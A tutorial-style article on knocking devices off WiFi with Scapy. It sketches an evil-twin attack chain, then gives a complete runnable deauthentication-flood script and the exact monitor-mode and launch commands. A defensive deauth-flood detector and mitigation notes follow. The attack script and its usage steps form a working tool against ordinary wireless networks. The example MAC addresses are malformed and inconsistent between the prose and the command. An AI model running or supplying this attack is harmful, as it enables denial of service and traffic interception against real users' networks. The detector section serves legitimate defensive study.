How to disconnect devices from WiFi using Scapy

Scapy is a powerful Python-based packet manipulation tool that can be used for network analysis and packet sniffing.

While it can be used for legitimate purposes, it can also be used by hackers to launch attacks on wireless networks, including the disconnection of devices from WiFi.

Deauthentication frames impersonating an Access Point


Disrupting WiFi with Scapy


Here is an example of how a hacker could potentially use Scapy to disconnect devices from a WiFi network:

  1. The hacker sets up a wireless access point with the identical SSID as the target network. This is known as an evil twin attack.

  2. The hacker uses Scapy to capture the MAC addresses of all devices connected to the target network.

  3. The hacker then sends de-authentication packets using Scapy, spoofing the source MAC address to that of the access point. This makes it appear that the de-authentication packets are coming from a legitimate WiFi access point.

  4. The de-authentication packets are sent to each of the devices whose MAC addresses were captured in step 2, causing them to disconnect from the target network.

  5. The hacker can then launch a man-in-the-middle (MitM) attack, intercepting the traffic of the disconnected devices and potentially stealing sensitive information.

Code example

To disconnect a device from the WiFi using Scapy, we will need a Linux machine that is connected to the WiFi network, and code like the one shown below in a file named scapy.py:

from scapy.all import *

def deauth(target_mac, gateway_mac, inter=0.1, count=None, loop=1, iface="wlan0mon", verbose=1):
    # 802.11 frame
    # addr1: destination MAC
    # addr2: source MAC
    # addr3: Access Point MAC
    dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
    # stack them up
    packet = RadioTap()/dot11/Dot11Deauth(reason=7)
    # send the packet
    sendp(packet, inter=inter, count=count, loop=loop, iface=iface, verbose=verbose)

if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="A python script for sending deauthentication frames")
    parser.add_argument("target", help="Target MAC address to deauthenticate.")
    parser.add_argument("gateway", help="Gateway MAC address that target is authenticated with")
    parser.add_argument("-c" , "--count", help="number of deauthentication frames to send, specify 0 to keep sending infinitely, default is 0", default=0)
    parser.add_argument("--interval", help="The sending frequency between two frames sent, default is 100ms", default=0.1)
    parser.add_argument("-i", dest="iface", help="Interface to use, must be in monitor mode, default is 'wlan0mon'", default="wlan0mon")
    parser.add_argument("-v", "--verbose", help="whether to print messages", action="store_true")
    args = parser.parse_args()
    target = args.target
    gateway = args.gateway
    count = int(args.count)
    interval = float(args.interval)
    iface = args.iface
    verbose = args.verbose
    if count == 0:
        # if count is 0, it means we loop forever (until interrupt)
        loop = 1
        count = None
    else:
        loop = 0
    # printing some info messages
    if verbose:
        if count:
            print(f"[+] Sending {count} frames every {interval}s...")
        else:
            print(f"[+] Sending frames every {interval}s for ever...")
    deauth(target, gateway, interval, count, loop, iface, verbose)

We can then run the code after putting the wireless interface into monitor mode using the sudo ifconfig wlan0 down command followed by the sudo iwconfig wlan0 mode monitor command. So if we want to de-authenticate a user whose target MAC address is 00:ak:fa:71:e2:5e and the access point for the target is e8:79:f6:c4:98:3f, we can do this through the Linux terminal using python3 scapy.py 00:ak:fa:71:e2:5e e8:76:f6:c4:98:3f -i wlan0mon -v.

Protecting against Scapy-based WiFi attacks

A hacker may want to disconnect devices from WiFi using Scapy for various reasons, such as:

  1. Conducting a man-in-the-middle attack: By disconnecting a victim's device from the WiFi network, a scammer can force them to connect to a malicious network controlled by the attacker. This allows the scammer to intercept and alter the victim's network traffic, stealing sensitive information such as login credentials or personal data.

  2. Performing a denial-of-service attack: Scammers may use Scapy to send de-authentication packets to a victim's device, which will force the device to disconnect from the WiFi network. This can be used to prevent the victim from accessing the network, causing inconvenience or even financial losses.

Conclusion


The main goal of a scammer using Scapy to disconnect devices from WiFi is to gain unauthorized access to the network or disrupt its normal operation for personal gain. It is important to be aware of these types of attacks and take appropriate measures to protect against them, such as using strong passwords, enabling two-factor authentication, and keeping software up-to-date.

It's important to note that performing such an attack is illegal and unethical. Additionally, network administrators need to implement strong security measures, such as encryption and authentication protocols, monitoring the network for suspicious activity, and maintaining a secure and up-to-date network infrastructure.
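
One way to do the monitoring mentioned above, as an added example that is not code from the original article: a standard-library Python detector that parses radiotap + 802.11 headers and flags any source sending more than `threshold` deauthentication frames to one destination within `window` seconds. The function names, thresholds, MAC addresses and sample frames are constructed for illustration.

```python
import struct
from collections import defaultdict, deque

def parse_deauth(raw):
    """Return (dst, src, bssid, reason) for a radiotap + 802.11 deauth frame, else None."""
    # Radiotap: version(1) pad(1) length(2, little-endian) present(4)
    rt_len = struct.unpack_from("<H", raw, 2)[0] if len(raw) >= 8 else 0
    body = raw[rt_len:]
    if rt_len < 8 or len(body) < 26:        # 24-byte 802.11 header + 2-byte reason code
        return None
    ftype, subtype = (body[0] >> 2) & 0x3, (body[0] >> 4) & 0xF
    if ftype != 0 or subtype != 12:         # management type 0, deauthentication subtype 12
        return None
    reason = struct.unpack_from("<H", body, 24)[0]
    return body[4:10].hex(":"), body[10:16].hex(":"), body[16:22].hex(":"), reason

def detect_floods(frames, threshold=5, window=1.0):
    """Return (src, dst) pairs exceeding `threshold` deauths within `window` seconds."""
    recent, flagged = defaultdict(deque), set()
    for ts, raw in frames:                  # frames: (timestamp, raw_bytes) in time order
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        dst, src, _bssid, _reason = parsed
        q = recent[(src, dst)]
        q.append(ts)
        while ts - q[0] > window:           # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            flagged.add((src, dst))
    return sorted(flagged)

def build_frame(subtype, dst, src, bssid, reason=7):
    """Constructed test input: minimal radiotap header + 802.11 management frame."""
    radiotap = struct.pack("<BBHI", 0, 0, 8, 0)
    hdr = bytes([subtype << 4, 0]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00"
    return radiotap + hdr + struct.pack("<H", reason)

# Constructed, locally administered MAC addresses (not taken from the article)
AP, CLIENT = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")

def sample_capture():
    """Constructed capture: a deauth burst at 100 ms spacing, beacons, one lone deauth."""
    burst = [(i * 0.1, build_frame(12, CLIENT, AP, AP)) for i in range(20)]
    beacons = [(i * 0.1 + 0.05, build_frame(8, b"\xff" * 6, AP, AP)) for i in range(20)]
    lone = [(60.0, build_frame(12, AP, CLIENT, AP, reason=3))]
    return sorted(burst + beacons + lone, key=lambda f: f[0])

if __name__ == "__main__":
    print(detect_floods(sample_capture()))
```

A burst of deauthentication frames claiming the access point's address as source is what the script above produces, while a single client-initiated deauth stays below the threshold. Enabling 802.11w Protected Management Frames on the access point and clients lets clients reject such forged frames.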
